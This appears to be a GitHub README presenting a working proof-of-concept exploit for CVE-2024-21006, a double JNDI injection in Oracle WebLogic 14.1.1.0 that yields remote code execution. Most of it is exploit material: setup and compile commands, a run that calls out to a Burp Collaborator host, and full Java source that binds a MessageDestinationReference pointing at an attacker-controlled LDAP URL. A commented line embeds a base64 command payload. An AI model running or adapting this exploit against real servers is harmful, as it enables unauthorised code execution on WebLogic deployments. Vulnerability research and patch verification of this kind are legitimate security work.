# WebLogic - CVE-2024-21006 CVE-2024-21006 reveals a new WebLogic attack method: secondary JNDI injection, that is, triggering JNDI injection during the JNDI injection process, thereby completing **RCE**. Project is based on the findings of [pwnull](https://pwnull.github.io/2024/oracle%20weblogic%20CVE-2024-21006%20Double-JNDInjection%20RCE%20analyze/) and code from [momika223](https://github.com/momika233/CVE-2024-21006). ## Proof-of-Concept ### Oracle 14.1.1.0 ```bash apt :: ~ » docker container ls CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES fa9822b7dfd5 container-registry.oracle.com/middleware/weblogic:14.1.1.0 "/u01/oracle/createA…" 23 hours ago Up 2 hours 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp 14110-weblogic ``` Prepare the environment by uploading `MainClass.java` and `META-INF/MANIFEST.MF` to the WebLogic container. ```bash [oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MainClass.java [oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MANIFEST.MF [oracle@14110-weblogic lib]$ mkdir META-INF [oracle@14110-weblogic lib]$ mv MANIFEST.MF META-INF/ ``` Compile the code. ```bash [oracle@14110-weblogic lib]$ javac -cp /u01/oracle/wlserver/server/lib/weblogic.jar MainClass.java [oracle@14110-weblogic lib]$ ls -al | grep MainClass -rw-rw-r-- 1 oracle oracle 2033 Oct 10 08:03 MainClass$1.class -rw-rw-r-- 1 oracle oracle 1386 Oct 10 08:03 MainClass.class -rw-rw-r-- 1 oracle oracle 3717 Oct 10 08:01 MainClass.java [oracle@14110-weblogic lib]$ jar cvfm cve-2024-21006.jar META-INF/MANIFEST.MF *.class added manifest adding: MainClass$1.class(in = 2033) (out= 671)(deflated 66%) adding: MainClass.class(in = 2161) (out= 1100)(deflated 49%) ``` ```bash [oracle@14110-weblogic lib]$ java -jar cve-2024-21006.jar Target IP: 127.0.0.1 Target Port: 7001 RMI Address (ip:port/exp): wssm1qvzn5i56ehqjskcwdmtckib639ry.oastify.com ```

Burp Collaborator callback indicating a successful exploit attempt

## Source code ```java // MainClass.java import weblogic.j2ee.descriptor.InjectionTargetBean; import weblogic.j2ee.descriptor.MessageDestinationRefBean; import javax.naming.*; import java.util.Scanner; import java.util.Hashtable; import java.util.Random; public class MainClass { public static void main(String[] args) throws Exception { Scanner scanner = new Scanner(System.in); System.out.print("Target IP: "); String ip = scanner.nextLine(); System.out.print("Target Port: "); String port = scanner.nextLine(); System.out.print("RMI Address (ip:port/exp): "); String rmiexp = scanner.nextLine(); Random bindname = new Random(); int bindint = bindname.nextInt(10000); // String ip = "127.0.0.1"; // String port = "7001"; // String rmiurl = "ldap://192.168.0.103/cVLtcNoHML/Plain/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL3N1Y2Nlc3MxMjMifQ=="; String rhost = String.format("iiop://%s:%s", ip, port); Hashtable env = new Hashtable(); // add wlsserver/server/lib/weblogic.jar to classpath,else will error. env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory"); env.put(Context.PROVIDER_URL, rhost); Context context = new InitialContext(env); // Reference reference = new Reference("weblogic.application.naming.MessageDestinationObjectFactory","weblogic.application.naming.MessageDestinationObjectFactory",""); weblogic.application.naming.MessageDestinationReference messageDestinationReference=new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() { @Override public String[] getDescriptions() { return new String[0]; } @Override public void addDescription(String s) { } @Override public void removeDescription(String s) { } @Override public void setDescriptions(String[] strings) { } @Override public String getMessageDestinationRefName() { return null; } @Override public void setMessageDestinationRefName(String s) { } @Override public String getMessageDestinationType() { return "weblogic.application.naming.MessageDestinationReference"; } @Override public void setMessageDestinationType(String s) { } @Override public String getMessageDestinationUsage() { return null; } @Override public void setMessageDestinationUsage(String s) { } @Override public String getMessageDestinationLink() { return null; } @Override public void setMessageDestinationLink(String s) { } @Override public String getMappedName() { return null; } @Override public void setMappedName(String s) { } @Override public InjectionTargetBean[] getInjectionTargets() { return new InjectionTargetBean[0]; } @Override public InjectionTargetBean createInjectionTarget() { return null; } @Override public void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) { } @Override public String getLookupName() { return null; } @Override public void setLookupName(String s) { } @Override public String getId() { return null; } @Override public void setId(String s) { } }, "ldap://" + rmiexp, null, null); context.bind("pthree"+bindint,messageDestinationReference); context.lookup("pthree"+bindint); } } ``` ```java // META-INF/MANIFEST.MF Manifest-Version: 1.0 Main-Class: MainClass Class-Path: /u01/oracle/wlserver/server/lib/weblogic.jar ```